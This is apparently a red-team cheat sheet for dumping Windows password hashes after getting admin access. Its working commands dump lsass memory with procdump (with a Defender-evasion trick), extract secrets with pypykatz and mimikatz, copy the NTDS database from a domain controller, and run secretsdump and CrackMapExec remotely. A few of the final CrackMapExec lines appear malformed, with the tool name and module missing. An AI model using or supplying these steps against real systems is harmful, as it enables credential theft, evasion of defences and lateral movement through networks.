After getting admin access, one of the first thing you should try is to extract password hashes. Having these at hand is pivotal in moving laterally in the network.

Sysinternals’ procdump can be used to do a memory dump of the lsass.exe process. Be careful though, this has been known to trip Windows Defender. If you have fast enough fingers, you can copy the dump file before it gets deleted by defender.

procdump -accepteula -ma lsass.exe lsass.dmp

Bypass Windows Defender by specifying a PID instead of the process name.

tasklist | findstr lsass.exe
procdump -accepteula -ma PID lsass.dmp

Extract hashes from lsass.dmp using pypykatz.

pip3 install pypykatz
pypykatz lsa minidump lsass.dmp

You can also use mimikatz, one of the most popular tool for dumping windows hashes.

Invoke-Mimikatz -Command "token::elevate" "lsadump::sam" "lsadump::secrets"

It’s also possible to dump Active Directory domain controller hashes.

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\windows\temp\dmp' q q"

Copy the dumped hive files and extract hashes locally using secretsdump.py.

secretsdump.py -ntds ntds.dit -system SYSTEM -security SECURITY local

Remote dumping is possible, but you need valid credentials and access to the internal network.

proxychains4 -q secretsdump.py DOMAIN/USER:'PASSWORD'@HOST
Invoke-Mimikatz -Computer 'DC01.DOMAIN.LOCAL' -Command '"token::elevate" "lsadump::sam" "lsadump::secrets"'

Via CrackMapExec.

pip install crackmapexec

proxychains -q crackmapexec smb HOST -u USER -p 'PASSWORD' -M mimikatz
proxychains -q smb HOST -u USER -p 'PASSWORD' -M --sam
proxychains -q smb HOST -u USER -p 'PASSWORD' -M --lsa